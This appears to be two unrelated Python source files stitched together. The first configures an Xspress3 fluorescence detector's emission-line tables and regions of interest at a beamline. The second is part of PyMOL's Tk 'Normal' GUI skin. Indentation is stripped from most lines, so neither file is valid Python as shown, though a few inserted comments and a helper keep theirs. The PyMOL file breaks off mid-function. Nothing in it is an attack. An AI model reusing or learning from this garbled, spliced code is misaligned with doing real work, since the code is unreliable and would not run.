def unstage(self, *args, **kwargs):
try:
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
finally:
for j in itertools.count():
try:
ret = super().unstage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < N_try:
print(f"failed to unstage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
return ret
xspress3 = HxnXspress3Detector('XF:03IDC-ES{Xsp:1}:', name='xspress3')
# Create directories on the xspress3 server, otherwise scans can fail:
xspress3.make_directories.put(True)
elem_K_list = np.array(['Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe','Cs','Ba','La','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf'])
energy_K_list = np.array([1040,1254,1487,1740,2011,2310,2622,2958,3314,3692,4093,4512,4953,5415,5900,6405,6931,7480,8046,8637,9251,9886,10543,11224,11924,12648,13396,14165,14958,15775,16615,17480,18367,19279,20216,21177,22163,23173,24210,25271,26359,27473,28612,29775,30973,32194,33442,55790,57535,59318,61141,63000,64896,66831,68806,70818,72872,74970,77107,79291,81516,83785,86106,88478,90884,34720,36027,37361,38725,40118,41542,42996,44482,45999,47547,49128,50742,52388,54070,93351,95868,98440,101059,103734,106472,109271,112121,115032])
elem_L_list = np.array(['Zn_L','Ga_L','Ge_L','AS_L','Se_L','Br_L','Kr_L','Rb_L','Sr_L','Y_L','Zr_L','Nb_L','Mo_L','Tc_L','Ru_L','Rh_L','Pd_L','Ag_L','Cd_L','In_L','Sn_L','Sb_L','Te_L','I_L','Xe_L','Cs_L','Ba_L','La_L','Hf_L','Ta_L','W_L','Re_L','Os_L','Ir_L','Pt_L','Au_L','Hg_L','Tl_L','Pb_L','Bi_L','Po_L','At_L','Rn_L','Fr_L','Ra_L','Ac_L','Ce_L','Pr_L','Nd_L','Pm_L','Sm_L','Eu_L','Gd_L','Tb_L','Dy_L','Ho_L','Er_L','Tm_L','Yb_L','Lu_L','Th_L','Pa_L','U_L','Np_L','Pu_L','Am_L','Cm_L','Bk_L','Cf_L'])
energy_L_list = np.array([1012,1098,1186,1282,1379,1481,1585,1692,1806,1924,2044,2169,2292,2423,2558,2697,2838,2983,3133,3280,3444,3604,3768,3938,4110,4285,4467,4647,7899,8146,8398,8652,8911,9175,9442,9713,9989,10269,10551,10839,11131,11427,11727,12031,12339,12652,4839,5035,5228,5432,5633,5850,6053,6273,6498,6720,6949,7180,7416,7655,12968,13291,13614,13946,14282,14620,14961,15308,15660])
elem_M_list = np.array(['Hf_M','Ta_M','W_M','Re_M','Os_M','Ir_M','Pt_M','Au_M','Hg_M','Tl_M','Pb_M','Bi_M','Po_M','At_M','Rn_M','Fr_M','Ra_M','Ac_M','Ce_M','Pr_M','Nd_M','Pm_M','Sm_M','Eu_M','Gd_M','Tb_M','Dy_M','Ho_M','Er_M','Tm_M','Yb_M','Lu_M','Th_M','Pa_M','U_M','Np_M','Pu_M','Am_M','Cm_M','Bk_M','Cf_M'])
energy_M_list = np.array([1646,1712,1775,1840,1907,1976,2048,2118,2191,2267,2342,2418,2499,2577,2654,2732,2806,2900,884,927,979,1023,1078,1122,1181,1233,1284,1342,1404,1463,1526,1580,2990,3071,3164,3250,3339,3429,3525,3616,3709])
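# The arrays above are parallel lookup tables: each elem_*_list entry names an
# emission line and the matching energy_*_list entry gives its energy in eV
# (e.g. Fe K at 6405 eV, Pt L at 9442 eV); xspress3_roi_setup() below centres a
# +/-150 eV ROI window on every requested line.
#
# Minimal lookup sketch built on those tables (illustrative helper only, not
# used by the setup code below):
def lookup_line_energy(elem):
    """Return the tabulated emission-line energy in eV, or None if unknown."""
    for elems, energies in ((elem_K_list, energy_K_list),
                            (elem_L_list, energy_L_list),
                            (elem_M_list, energy_M_list)):
        if elem in elems:
            return int(energies[elems == elem][0])
    return None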
def xspress3_roi_setup():
elem_list = np.array(['P','Si','S','Cl','Ca','K','Fe','Zn','Mn','Cu','Ni','Cr','Co','Pt_L','Pt_M','Er_L'])
num_elem = np.size(elem_list)
if num_elem > 16:
num_elem = 16
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
for i in range(num_elem):
if elem_list[i] in elem_K_list:
energy = energy_K_list[elem_K_list == elem_list[i]]
elif elem_list[i] in elem_L_list:
energy = energy_L_list[elem_L_list == elem_list[i]]
elif elem_list[i] in elem_M_list:
energy = energy_M_list[elem_M_list == elem_list[i]]
else:
print(elem_list[i], 'is not defined.')
break
channel.set_roi(i+1, energy-150, energy+150, name=elem_list[i])
'''
def xspress3_roi_setup():
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
#channel.set_roi(1, 9300, 9600, name='Pt')
channel.set_roi(1, 1590, 1890, name='Si')
#channel.set_roi(2, 1898, 2198, name='Pt_M')
#channel.set_roi(2, 2150, 2450, name='S')
#channel.set_roi(2, 14000, 14300, name='Sr')
#channel.set_roi(2, 3790, 4090, name='I')
#channel.set_roi(2, 3850, 4140, name='Bi_M')
#channel.set_roi(2, 3300, 3600, name='Sn')
channel.set_roi(4, 8250, 8550, name='W')
channel.set_roi(2, 4690, 4990, name='Ce')
#channel.set_roi(3, 4150, 4450, name='Cs')
#channel.set_roi(2, 2019, 2319, name='Nb')
#channel.set_roi(3, 5700, 6000, name='Eu')
channel.set_roi(3, 4360, 4660, name='Ti')
#channel.set_roi(3, 6800, 7100, name='Er')
#channel.set_roi(5, 4250, 4550, name='Ba')
channel.set_roi(5, 4150, 4450, name='Cs')
#channel.set_roi(3, 1970, 2270, name='Au_M')
#channel.set_roi(4, 5750, 6050, name='Mn')
#channel.set_roi(5, 2472, 2772, name='Cl')
#channel.set_roi(5, 2200, 2500, name='Pb_M')
#channel.set_roi(5, 2810, 3110, name='Ag')
#channel.set_roi(5, 6780, 7080, name='Co')
channel.set_roi(6, 3542, 3842, name='Ca')
channel.set_roi(7, 3130, 3430, name='In')
channel.set_roi(8, 5900, 6200, name='Gd')
channel.set_roi(9, 5078, 5378, name='Nd')
#channel.set_roi(9, 4800, 5100, name='V')
#channel.set_roi(7, 1850, 2150, name='P')
#channel.set_roi(8, 3000, 3300, name='Cd')
channel.set_roi(10, 5270, 5570, name='Cr')
#channel.set_roi(9, 3160, 3460, name='K')
#channel.set_roi(10, 10400, 10700, name='Pb')
#channel.set_roi(10, 3600, 3900, name='Te')
#channel.set_roi(11, 9550, 9850, name='Au')
channel.set_roi(11, 6250, 6550, name='Fe')
channel.set_roi(12, 11050, 11350, name='Se')
#channel.set_roi(13, 8487, 8787, name='Zn')
channel.set_roi(13, 8000, 8300, name='Ta')
channel.set_roi(14, 7330, 7630, name='Ni')
#channel.set_roi(15, 7950, 8150, name='Cu')
channel.set_roi(15, 9300, 9600, name='Pt')
#channel.set_roi(16, 11775, 12075, name='Br')
#channel.set_roi(16, 9736, 10036, name='Ge')
# channel.set_roi(17, 8250, 8550, 'W')
# channel.set_roi(18, 9600, 9750, 'Au')
# channel.set_roi(19, 11500, 12500, 'EL')
# channel.set_roi(20, 1900, 2000, 'Y')
# channel.set_roi(15, 1340, 1640, name='Al')
# channel.set_roi(22, 4360, 4660, 'Ti')
# channel.set_roi(23, 4550, 4750, 'La')
channel.set_roi(16, 9150, 9350, name='Ga')
'''
try:
print('Configuring Xspress3 ROIs...')
xspress3_roi_setup()
print('Done')
except KeyboardInterrupt:
print('Xspress3 ROI configuration cancelled.')
def hint_xspress_element(elm):
elm = elm.upper()
xspress3.hints['fields'] = [f'Det{j}_{elm}' for j in (1, 2, 3)]
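# Example: hint_xspress_element('Fe') sets xspress3.hints['fields'] to
# ['Det1_FE', 'Det2_FE', 'Det3_FE'], so only those per-channel Fe ROI keys are
# picked up for live plots and tables (assuming the ROI data keys follow the
# Det<N>_<ELEMENT> naming convention).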
def configure_xspress3(sclr):
sclr.configuration_attrs = sclr.component_names
sclr.flyer_timestamps.kind = 'omitted'
sclr.roi_data.kind = 'omitted'
sclr.make_directories.kind = 'omitted'
sclr.rewindable.kind = 'omitted'
for k, chan in sclr.channels.items():
chan.configuration_names.kind = 'config'
chan.vis_enabled.kind = 'omitted'
chan.rois.kind = 'normal'
chan.rois.num_rois.kind = 'config'
        chan.name = chan.name.replace('annel', '')  # e.g. 'xspress3_channel1' -> 'xspress3_ch1'
for n in chan.rois.component_names:
if 'roi' in n and n != 'num_rois':
roi = getattr(chan.rois, n)
roi.kind = 'normal'
roi.value.kind = 'normal'
roi.value_sum.kind = 'omitted'
else:
attr = getattr(chan.rois, n)
attr.kind = 'config'
configure_xspress3(xspress3)
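# Note on the `kind` flags used above (standard ophyd semantics): components marked
# 'normal' show up in detector.read(), 'config' components in
# detector.read_configuration(), and 'omitted' components in neither. So after
# configure_xspress3(xspress3) the per-ROI values are reported as data, while most
# of the channel bookkeeping is pushed into the configuration or dropped.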
|
__init__.py
|
DEBUG = False
import sys
import re
import threading
import os
import time
if True:
from tkinter import *
import tkinter.filedialog as tkFileDialog
import tkinter.messagebox as tkMessageBox
import tkinter.font as tkFont
_next_method_name = '__next__'
import Pmw
from pymol.wizard import cleanup
from pmg_tk.Setting import Setting
from pmg_tk.SetEditor import SetEditor
from pmg_tk.ColorEditor import ColorEditor
from pmg_tk.skins import PMGSkin
from .builder import Builder
import pymol._gui
import traceback
root = None
def encode(s):
# obsolete since removal of py2
return s
def split_tk_file_list(pattern):
filenames = []
while True:
pattern = pattern.strip()
if not pattern:
break
sep = None
if pattern[0] == '{':
pattern = pattern[1:]
sep = '}'
a = pattern.split(sep, 1)
filenames.append(a[0])
pattern = a[1] if len(a) == 2 else ''
return filenames
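# Example (sketch): some Tk builds return a multi-selection as a single string with
# brace-quoted entries for names containing spaces, e.g.
#   split_tk_file_list('{my file.pdb} other.pdb') -> ['my file.pdb', 'other.pdb']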
def asksaveasfilename(*args, **kwargs):
filename = tkFileDialog.asksaveasfilename(*args, **kwargs)
return encode(filename)
def askopenfilename(*args, **kwargs):
filename = tkFileDialog.askopenfilename(*args, **kwargs)
if not filename:
return filename
multiple = kwargs.get('multiple', 0)
if not multiple:
filename = [filename]
elif not isinstance(filename, (list, tuple)):
filename = split_tk_file_list(filename)
filename = map(os.path.normpath, filename)
filename = map(encode, filename)
filename = list(filename)
if not multiple:
return filename[0]
return filename
def _darwin_browser_open(url):
os.popen("open "+url,'r').read()
def darwin_browser_open(url):
t = threading.Thread(target=_darwin_browser_open,args=(url,))
t.setDaemon(1)
t.start()
def _doAsync(self_cmd,cmmd,dirty=0):
self_cmd.do(cmmd) # force strict ordering of commands
if dirty:
self_cmd.dirty()
def _def_ext(ext): # platform-specific default extension handling
if sys.platform != 'win32':
ext = None # default extensions don't work right under X11/Tcl/Tk
return ext
class Normal(PMGSkin, pymol._gui.PyMOLDesktopGUI):
pad = ' ' # extra space in menus
appname = 'The PyMOL Molecular Graphics System'
appversion = '0.0.0.0' # will be set in __init__
copyright = ('Copyright (C) 2003-%d\n' % (time.localtime().tm_year,) +
'Schrodinger LLC.\n'+
'All rights reserved.')
contactweb = 'http://www.pymol.org'
contactemail = 'sales@schrodinger.com'
def scene_panel_menu_dialog(self):
print("scene_panel_menu_dialog not available in pmg_tk.")
# responsible for setup and takedown of the normal skin
def _inc_fontsize(self, delta, font):
size = font.cget('size')
sign = -1 if size < 0 else 1
size = max(5, abs(size) + delta)
font.configure(size=size * sign)
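    # Tk font sizes may be negative (pixel units) rather than positive (points);
    # _inc_fontsize scales the magnitude and preserves the sign, with a floor of 5.
    # E.g. size -12 with delta +1 becomes -13, and size 6 with delta -1 becomes 5.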
def inc_fontsize(self, delta=1):
for name in tkFont.names():
self._inc_fontsize(delta, tkFont.nametofont(name))
def inc_fontsize_dialog(self):
dialog = Toplevel(self.root)
grid = dialog
kw = {'row': 0, 'sticky': 'w', 'padx': 5, 'pady': 5}
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self.inc_fontsize(-1)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self.inc_fontsize( 1)).grid(column=col(), **kw)
Label(grid, text='All GUI Font Sizes').grid(column=col(), **kw)
kw['row'] = 1
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self._inc_fontsize(-1, self.fixedfont)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self._inc_fontsize( 1, self.fixedfont)).grid(column=col(), **kw)
Label(grid, text='Output Font Size').grid(column=col(), **kw)
dialog.title('GUI Font Size')
@property
def initialdir(self):
'''
Be in sync with cd/pwd on the console until the first file has been
browsed, then remember the last directory.
'''
return self._initialdir or os.getcwd()
@initialdir.setter
def initialdir(self, value):
self._initialdir = value
def cd_dialog(self):
self.cmd.cd(encode(tkFileDialog.askdirectory(
title="Change Working Directory",
initialdir=self.initialdir)) or '.', quiet=0)
def createDataArea(self):
# Create data area where data entry widgets are placed.
self.dataArea = self.app.createcomponent('dataarea',
(), None,
Frame, (self.app._hull,),
relief=SUNKEN,
bd=1)
self.dataArea.pack(side=LEFT, fill=BOTH, expand=YES,
padx=1, pady=1)
def destroyDataArea(self):
self.app.destroycomponent('dataarea')
def createCommandArea(self):
# Create a command area for application-wide buttons.
self.commandFrame = self.app.createcomponent('commandframe', (), None,
Frame,(self.app._hull,),relief=SUNKEN,bd=1)
self.commandFrame.place(width=500)
self.commandFrame.pack(side=TOP,
expand=NO,
fill=BOTH,
padx=1,
pady=1)
def destroyCommandArea(self):
self.app.destroycomponent('commandframe')
def createMessageBar(self):
self.messageBar = Pmw.MessageBar(self.commandFrame, entry_width = 25,
entry_relief='sunken', entry_borderwidth=1) #, labelpos = 'w')
self.abortButton=Button(self.commandFrame,
text='Abort',highlightthickness=0,
command=lambda s=self:self.abort(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.abortButton=Button(self.commandFrame,
text='Rebuild',highlightthickness=0,
# state=DISABLED,
command=lambda s=self:self.rebuild(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.messageBar.pack(side=BOTTOM, anchor=W, fill=X, expand=1)
self.balloon.configure(statuscommand = self.messageBar.helpmessage)
def destroyMessageBar(self):
self.messageBar.destroy()
def get_current_session_file(self):
session_file = self.cmd.get_setting_text("session_file")
session_file = session_file.replace("\\","/") # always use unix-like path separators
return session_file
def set_current_session_file(self, session_file):
session_file = session_file.replace("\\","/") # always use unix-like path separators
self.cmd.set("session_file",session_file)
def confirm_quit(self,e=None):
if self.cmd.get_setting_boolean("session_changed"):
session_file = self.get_current_session_file()
if session_file != '':
message = "Save the current session '%s'?"%os.path.split(session_file)[1]
else:
message = "Save the current session?"
check = tkMessageBox._show("Save Session", message,
tkMessageBox.QUESTION, tkMessageBox.YESNOCANCEL)
if check==tkMessageBox.YES:
if self.session_save():
self.quit_app()
elif check==tkMessageBox.NO:
self.quit_app()
else:
self.quit_app()
def quit_app(self):
self.cmd.log_close()
self.cmd.quit() # avoid logging this - it is inconvenient...
def buttonAdd(self,frame,text,cmmd):
newBtn=Button(frame,
text=text,highlightthickness=0,
command=cmmd,padx=0,pady=0)
newBtn.pack(side=LEFT,fill=BOTH,expand=YES)
return newBtn
def get_view(self):
self.cmd.get_view(2, quiet=0)
try:
str = self.cmd.get_view(3,quiet=1)
self.root.clipboard_clear()
self.root.clipboard_append(str)
self.last_view = str
self.app.selection_clear()
self.app.selection_own()
self.app.selection_handle(lambda a,b,s=self:s.last_view)
print(" PyMOL: Viewing matrix copied to clipboard.")
except:
traceback.print_exc()
def createButtons(self):
self.buttonArea = Frame(self.root)
self.buttonArea.pack(side=TOP, anchor=W)
row1 = self.app.createcomponent('row1', (), None,
Frame,self.commandFrame,bd=0)
row1.pack(side=TOP,fill=BOTH,expand=YES)
btn_reset = self.buttonAdd(row1,'Reset',lambda s=self: s.cmd.do("_ reset"))
btn_reset = self.buttonAdd(row1,'Zoom',lambda s=self: s.cmd.do("_ zoom animate=-1"))
btn_orient = self.buttonAdd(row1,'Orient',lambda s=self: s.cmd.do("_ orient animate=1"))
btn_rtrace = self.buttonAdd(row1,'Draw',lambda s=self: s.cmd.do("_ draw"))
btn_rtrace = self.buttonAdd(row1,'Ray',lambda s=self: s.cmd.do("_ ray async=1"))
row2 = self.app.createcomponent('row2', (), None,
Frame,self.commandFrame,bd=0)
row2.pack(side=TOP,fill=BOTH,expand=YES)
btn_unpick = self.buttonAdd(row2,'Unpick',lambda s=self: s.cmd.do("_ unpick"))
btn_hidesele = self.buttonAdd(row2,'Deselect', lambda: self.cmd.do("_ deselect"))
btn_reset = self.buttonAdd(row2,'Rock',lambda s=self: s.cmd.do("_ rock"))
btn_getview = self.buttonAdd(row2,'Get View',lambda s=self: s.get_view()) # doesn't get logged
row3 = self.app.createcomponent('row3', (), None,
Frame,self.commandFrame,bd=0)
row3.pack(side=TOP,fill=BOTH,expand=YES)
btn_rewind = self.buttonAdd(row3,'|<',lambda s=self: s.cmd.do("_ rewind"))
btn_back = self.buttonAdd(row3,'<',lambda s=self: s.cmd.do("_ backward"))
btn_stop = self.buttonAdd(row3,'Stop',lambda s=self: s.cmd.do("_ mstop"))
btn_play = self.buttonAdd(row3,'Play',lambda s=self: s.cmd.do("_ mplay"))
btn_forward = self.buttonAdd(row3,'>',lambda s=self: s.cmd.do("_ forward"))
btn_last = self.buttonAdd(row3,'>|',lambda s=self: s.cmd.do("_ ending"))
btn_ccache = self.buttonAdd(row3,'MClear',lambda s=self: s.cmd.do("_ mclear"))
row4 = self.app.createcomponent('row4', (), None,
Frame,self.commandFrame,bd=0)
row4.pack(side=TOP,fill=BOTH,expand=YES)
self.cmdB = self.buttonAdd(row4,'Command',
lambda s=self:
s.toggleFrame(s.cmdFrame))
self.buildB = self.buttonAdd(row4,'Builder',
lambda s=self:
s.toggleFrame(s.buildFrame))
self.volB = self.buttonAdd(row4, 'Volume',
self.newVolumeFrame)
# initialize disabled
# self.volB.config(state=DISABLED)
def newVolumeFrame(self):
volumes = self.cmd.get_names_of_type("object:volume", public=1)
if not volumes:
return
if len(volumes) == 1:
self.cmd.volume_panel(volumes[0])
return
def callback():
sels = listbox.getcurselection()
if sels:
self.cmd.volume_panel(sels[0])
window.destroy()
title = 'Select a volume object'
window = Toplevel(self.app.root)
window.title(title)
listbox = Pmw.ScrolledListBox(window,
labelpos='nw',
label_text=title,
items=volumes,
selectioncommand=callback)
listbox.pack(padx=5, pady=5)
x, y = window.winfo_pointerxy()
window.geometry('+%d+%d' % (x - 20, y - 20))
def destroyButtonArea(self):
self.app.destroycomponent('row1')
self.app.destroycomponent('row2')
self.app.destroycomponent('row3')
self.app.destroycomponent('row4')
self.buttonArea.destroy()
def my_show(self,win,center=1):
win.show()
def my_withdraw(self,win):
        if sys.platform!='linux2': # Python 3 reports 'linux', so this branch is taken there
win.withdraw()
else:
win.destroy()
def my_activate(self,win,center=1,focus=None):
if sys.platform!='linux2':
win.activate()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
                x = max(0,(vw-tw)/2)  # center horizontally within the virtual root
                y = max(0,(vh-th)/2)  # center vertically within the virtual root
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
if focus!=None:
focus.focus_set()
win.mainloop()
def my_deactivate(self,win):
if sys.platform!='linux2':
win.deactivate()
else: # autocenter, deiconify, and run mainloop
win.destroy()
def doAsync(self,cmmd):
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd))
t.setDaemon(1)
t.start()
def command_get(self):
return self.command.get()
def command_set(self, v):
return self.command.set(v)
def command_set_cursor(self, i):
self.entry.icursor(i)
def dump(self,event):
print(dir(event))
print(event.keysym, event.keycode)
def createConsole(self):
self.command = StringVar()
self.lineCount = 0
self._setup_history()
self.cmdFrame = Frame(self.dataArea)
self.buildFrame = Builder(self.app, self.dataArea)
self.toggleFrame(self.cmdFrame,startup=1)
self.entryFrame = Frame(self.cmdFrame)
self.entryFrame.pack(side=BOTTOM,expand=NO,fill=X)
self.entry_label = Label(self.entryFrame, text="PyMOL>", padx=1, pady=1, justify=RIGHT)
self.entry_label.pack(side=LEFT,expand=NO,fill=X)
self.entry = Entry(self.entryFrame, justify=LEFT, width=70,
textvariable=self.command)
self.entry.pack(side=LEFT,expand=YES,fill=X)
self.output = Pmw.ScrolledText(self.cmdFrame)
self.output.pack(side=TOP, fill=BOTH, expand=YES)
self.entry.bind('<Return>', lambda e, s=self:
(s.doTypedCommand(s.command.get()), s.command.set('')))
self.entry.bind('<Tab>', lambda e, s=self: s.complete(e))
self.entry.bind('<Up>', lambda e, s=self: s.back())
self.entry.bind('<Down>', lambda e, s=self: s.forward())
self.entry.bind('<Control-Up>', lambda e: self.back_search())
self.root.protocol("WM_DELETE_WINDOW", lambda s=self: s.confirm_quit())
self.log_file = "log.pml"
# self.entry = self.app.createcomponent('entry', (), None,
# Entry,
# (self.dataArea,),
# justify=LEFT,
# width=50,
### textvariable=self.command)
text = self.output.component('text')
self.text = text
if sys.platform.startswith('win'):
self.font = 'lucida console' # only available on windows
self.my_fw_font=(self.font,8)
self.fixedfont.configure(family=self.font, size=self.my_fw_font[1])
else:
text.tk.call('tk','scaling',1)
self.font = 'fixed' # should be available on any X11-based platform
self.my_fw_font=(self.font,10)
if sys.platform == 'darwin':
self.fixedfont.configure(size=11)
text.configure(width=74)
self.balloon.bind(self.entry, '''Command Input Area
Get the list of commands by hitting <TAB>
Get the list of arguments for one command with a question mark:
PyMOL> color ?
Read the online help for a command with "help":
PyMOL> help color
Get autocompletion for many arguments by hitting <TAB>
PyMOL> color ye<TAB> (will autocomplete "yellow")
''')
if self.app.allow_after:
self.output.after(100,self.update_feedback)
self.output.after(100,self.update_menus)
self.output.pack(side=BOTTOM,expand=YES,fill=BOTH)
self.app.bind(self.entry, 'Command Input Area')
self.app.bind_all('<F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0)"))
self.app.bind_all('<F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0)"))
self.app.bind_all('<F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0)"))
self.app.bind_all('<F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0)"))
self.app.bind_all('<F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0)"))
self.app.bind_all('<F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0)"))
self.app.bind_all('<F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0)"))
self.app.bind_all('<F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0)"))
self.app.bind_all('<F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0)"))
self.app.bind_all('<F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0)"))
self.app.bind_all('<F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0)"))
self.app.bind_all('<F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0)"))
self.app.bind_all('<Control-F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0,2)"))
self.app.bind_all('<Control-F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0,2)"))
self.app.bind_all('<Control-F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0,2)"))
self.app.bind_all('<Control-F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0,2)"))
self.app.bind_all('<Control-F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0,2)"))
self.app.bind_all('<Control-F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0,2)"))
self.app.bind_all('<Control-F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0,2)"))
self.app.bind_all('<Control-F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0,2)"))
self.app.bind_all('<Control-F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0,2)"))
self.app.bind_all('<Control-F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0,2)"))
self.app.bind_all('<Control-F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0,2)"))
self.app.bind_all('<Control-F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0,2)"))
self.entry.bind('<Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0)"))
self.entry.bind('<Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0)"))
self.entry.bind('<Control-Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0,2)"))
self.entry.bind('<Control-Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0,2)"))
self.entry.bind('<Home>',lambda e,s=self: s.cmd.do("cmd._special(106,0,0)"))
self.entry.bind('<End>',lambda e,s=self: s.cmd.do("cmd._special(107,0,0)"))
def update_feedback(self):
feedback = self.cmd._get_feedback(self.cmd)
if feedback!=None:
self.text.configure(state='normal')
for a in feedback:
self.output.insert(END,"\n")
self.output.insert(END,a)
self.output.see(END)
self.lineCount = self.lineCount + 1
if self.lineCount > 10000:
self.output.delete('0.0','%i.%i' % (self.lineCount-5000,0))
self.lineCount=5000
self.text.configure(state='disabled')
progress = self.cmd.get_progress()
if progress>=0.0:
# self.abortButton.config(state=NORMAL)
self.messageBar.message("busy","Progress %d%%..."%int(progress*100))
else:
# self.abortButton.config(state=DISABLED)
self.messageBar.resetmessages("busy")
if self.app.allow_after:
if feedback == None: # PyMOL busy, so try more aggressively to get lock
self.output.after(10,self.update_feedback) # 100X a second
else:
self.output.after(100,self.update_feedback) # 10X a second
def abort(self):
self.cmd.interrupt()
# self.abortButton.config(state=DISABLED)
def rebuild(self):
self.doAsync("_ rebuild")
def toggleFrame(self, frame, startup=0):
if frame not in self.dataArea.slaves():
# clear all frames in dataArea
for f in self.dataArea.slaves():
f.pack_forget()
# add requested frame to data area
frame.pack(side=BOTTOM, fill=BOTH, expand=YES)
else:
# clear frame from data area
if frame != self.cmdFrame:
frame.pack_forget()
# next command will cause command frame to be turned on if
# nothing else is visible... might not want this behavior
self.cmdFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
frame = self.cmdFrame
if not startup:
if frame == self.cmdFrame:
if self.edit_mode != None:
self.cmd.edit_mode(self.edit_mode)
self.edit_mode = None
if self.auto_overlay != None:
self.cmd.set("auto_overlay",self.auto_overlay)
self.auto_overlay = None
if self.valence != None:
self.cmd.set("valence",self.valence)
elif frame == self.buildFrame:
frame.deferred_activate()
if "Editing" not in self.cmd.get("button_mode_name"):
self.cmd.edit_mode(1)
self.edit_mode = 0
self.valence = self.cmd.get("valence")
self.cmd.set("valence","1")
self.auto_overlay = self.cmd.get("auto_overlay")
self.cmd.set("auto_overlay",1)
def update_menus(self):
self.setting.refresh()
# 2019-06-25 Disabled because cmd.get_names_of_type() is a blocking
# command if the API is locked, blocks progress display.
if False:
# volume frame is closed, update the button
if len(self.cmd.get_names_of_type("object:volume",public=1))>0:
self.volB.config(state=NORMAL)
else:
self.volB.config(state=DISABLED)
# keep calling
if self.app.allow_after:
self.output.after(500,self.update_menus) # twice a second
def file_open(self,tutorial=0):
if not tutorial:
initdir = self.initialdir
ftypes = self.app.getLoadableFileTypes()
else:
initdir = os.environ['TUT']
# only list file extensions that are used for tutorial data
ftypes = [("Tutorial Data","*.pdb"),]
if TkVersion>8.3:
ofile_list = askopenfilename(initialdir = initdir,
filetypes=ftypes,
multiple=1) # new option in Tk 8.4
else:
ofile_list = [ askopenfilename(initialdir = initdir,
filetypes=ftypes) ]
for ofile in ofile_list:
if len(ofile):
if not tutorial:
self.initialdir = os.path.dirname(ofile)
try:
if ofile[-4:].lower() == '.pse' and ofile != self.save_file:
self.save_file = '' # remove ambiguous default
self.cmd.do('_ /cmd.load(%s, quiet=0)' % repr(ofile))
except self.pymol.CmdException:
print("Error: unable to open file '%s'"%ofile)
def log_open(self):
sfile = asksaveasfilename(initialfile = self.log_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.log_file = os.path.basename(sfile)
self.cmd.log_open(sfile)
def log_resume(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Resumable","*.pml"),
("All Resumable","*.pym"),
("All Resumable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.resume(ofile)
def log_append(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Appendable","*.pml"),
("All Appendable","*.pym"),
("All Appendable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.log_open(ofile,'a')
def session_save(self):
self.save_file = self.get_current_session_file()
if self.save_file!='':
